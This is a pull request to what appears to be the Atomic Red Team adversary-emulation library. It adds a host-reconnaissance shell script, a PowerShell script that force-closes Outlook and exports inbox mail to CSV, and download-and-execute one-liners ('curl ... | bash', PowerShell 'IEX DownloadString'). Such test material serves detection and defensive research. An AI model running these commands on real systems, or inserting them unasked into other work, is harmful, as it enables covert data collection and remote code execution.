### PR TITLE
T1074 update for OSX and Linux

### DIFF
--- a/atomics/T1074/Discovery.sh
+++ b/atomics/T1074/Discovery.sh
@@ -1,0 +1,15 @@
+#!/bin/
+
+curl ifconfig.me
+ifconfig
+whoami
+pwd
+ls -lhart /Users/
+ls /Applications/
+ls /Library/
+crontab -l
+at -l
+netstat -an | grep -i listen
+netstat -an | grep -i established
+arp -a
+ps aux

--- a/atomics/T1074/T1074.md
+++ b/atomics/T1074/T1074.md
@@ -6,8 +6,8 @@ Interactive command shells may be used, and common functionality within [cmd](ht
 
 ## Atomic Tests
 
-- [Atomic Test #1 - Stage data from Discovery.bat](#atomic-test-1---stage-data-from-discoverybat)
-
+- [Atomic Test #1- Stage data from Discovery.bat](#atomic-test-1---stage-data-from-discoverybat)
+- [Atomic Test #2 - Stage data from Discovery.sh](#atomic-test-2---stage-data-from-discoverysh)
 
 <br/>
 
@@ -20,5 +20,17 @@ Utilize powershell to download discovery.bat and save to a local file
 #### Run it with `powershell`!
 ```
 "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/ARTifacts/Misc/Discovery.bat')" > c:\windows\pi.log
+```
+<br/>
+
+## Atomic Test #2 - Stage data from Discover.sh
+Utilize curl to download discovery.sh and execute a basic information gathering shell script.
+
+**Supported Platforms:** Linux, macOS
+
+
+#### Run it with `bash`!
+```
+curl -s https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/ARTifacts/Misc/Discovery.sh | bash -s > /tmp/discovery.log
 ```
 <br/>

--- a/atomics/T1074/T1074.yaml
+++ b/atomics/T1074/T1074.yaml
@@ -14,3 +14,17 @@ atomic_tests:
     name: powershell
     command: |
       "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/ARTifacts/Misc/Discovery.bat')" > c:\windows\pi.log
+
+atomic_tests:
+- name: Stage data from Discovery.sh
+  description: |
+    Utilize curl to download discovery.sh and execute a basic information gathering shell script
+
+  supported_platforms:
+    - linux
+    - macos
+
+  executor:
+    name: bash
+    command: |
+      curl -s https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1074/Discovery.sh | bash -s > /tmp/discovery.log

--- a/atomics/T1114/Get-Inbox.ps1
+++ b/atomics/T1114/Get-Inbox.ps1
@@ -1,0 +1,61 @@
+<#
+.SYNOPSIS
+    
+    Scrapes message data from the inbox of the current user and stores data in 'mail.csv' in the directory where the scrip was executed
+    
+    Outlook Email Collection
+    MITRE ATT&CK - T1114
+    Author: Greg Foss (@heinzarelli)
+    Date: February, 2019
+    License: BSD 3-Clause
+
+.EXAMPLE
+
+    Display email contents in the terminal    
+    PS C:\> .\Get-Inbox.ps1
+
+    Write emails out to a CSV
+    PS C:\> .\Get-Inbox.ps1 -file "mail.csv"
+#>
+
+[CmdLetBinding()]
+param( [string]$file )
+
+function Kill-Outlook {
+
+    # Check to see if outlook is running, and close it to scrape mail data programmatically
+    $outlook = Get-Process -Name Outlook -ErrorAction SilentlyContinue
+    if ($outlook) {
+        $outlook.CloseMainWindow()
+        Sleep 5
+        if (!$outlook.HasExited) {
+            $outlook | Stop-Process -Force > $null
+        }
+    }
+    Remove-Variable outlook > $null
+}
+
+function Scrape-Outlook {
+
+    # Connect to the local outlook inbox and read mail
+    Add-type -assembly "Microsoft.Office.Interop.Outlook" | out-null
+    $olFolders = "Microsoft.Office.Interop.Outlook.olDefaultFolders" -as [type]
+    $inbox = new-object -comobject outlook.application
+    $namespace = $inbox.GetNameSpace("MAPI")
+    $folder = $namespace.getDefaultFolder($olFolders::olFolderInBox)
+    Write-Output "Please be patient, this may take some time..."
+    
+    # Output the data
+    if ( $file ) {
+        $folder.items |
+        Select-Object -Property Subject, ReceivedTime, SenderName, ReceivedByName, Body |
+        Export-Csv -Path $file
+    } else {
+        $folder.items |
+        Select-Object -Property Subject, ReceivedTime, SenderName, ReceivedByName
+    }
+}
+
+Kill-Outlook > $null
+Scrape-Outlook
+Kill-Outlook > $null

--- a/atomics/T1114/T1114.md
+++ b/atomics/T1114/T1114.md
@@ -1,0 +1,35 @@
+# T1114 - Email Collection
+## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1114)
+<blockquote>Adversaries may target user email to collect sensitive information from a target.
+
+Files containing email data can be acquired from a user's system, such as Outlook storage or cache files .pst and .ost.
+
+Adversaries may leverage a user's credentials and interact directly with the Exchange server to acquire information from within a network.
+
+Some adversaries may acquire user credentials and access externally facing webmail applications, such as Outlook Web Access.</blockquote>
+
+## Atomic Tests
+
+- [Atomic Test #1 - T1114 Email Collection with PowerShell](#atomic-test-1---t1114-email-collection-with-powershell)
+
+
+<br/>
+
+## Atomic Test #1 - T1114 Email Collection with PowerShell
+Search through local Outlook installation, extract mail, compress the contents, and saves everything to a directory for later exfiltration.
+
+**Supported Platforms:** Windows
+
+
+#### Run it with `command_prompt`!
+```
+Display email contents in the terminal
+  PS C:\> .\Get-Inbox.ps1
+
+Write emails out to a CSV
+  PS C:\> .\Get-Inbox.ps1 -file "mail.csv"
+
+Download and Execute
+  "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/ARTifacts/Misc/Get-Inbox.ps1')"
+```
+<br/>

--- a/atomics/T1114/T1114.yaml
+++ b/atomics/T1114/T1114.yaml
@@ -1,0 +1,25 @@
+---
+attack_technique: T1114
+display_name: Email Collection
+attack_link: https://attack.mitre.org/wiki/Technique/T1114
+
+atomic_tests:
+- name: T1114 Email Collection with PowerShell
+
+  description: |
+    Search through local Outlook installation, extract mail, compress the contents, and saves everything to a directory for later exfiltration.
+  
+  supported_platforms:
+    - windows
+  
+  executor:
+    name: command_prompt
+    command: |
+      Display email contents in the terminal
+        PS C:\> .\Get-Inbox.ps1
+
+      Write emails out to a CSV
+        PS C:\> .\Get-Inbox.ps1 -file "mail.csv"
+      
+      Download and Execute
+        "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/ARTifacts/Misc/Get-Inbox.ps1')"


### PR DESCRIPTION
**Details:**
Added a basic discovery.sh script, to simulate gathering host information on an OSX or Linux system. Provided one method of downloading and executing a shell script from a remote server.

**Testing:**
This has been tested on OSX 10.13.6 and Ubuntu 18.04.1.

**Associated Issues:**
N/A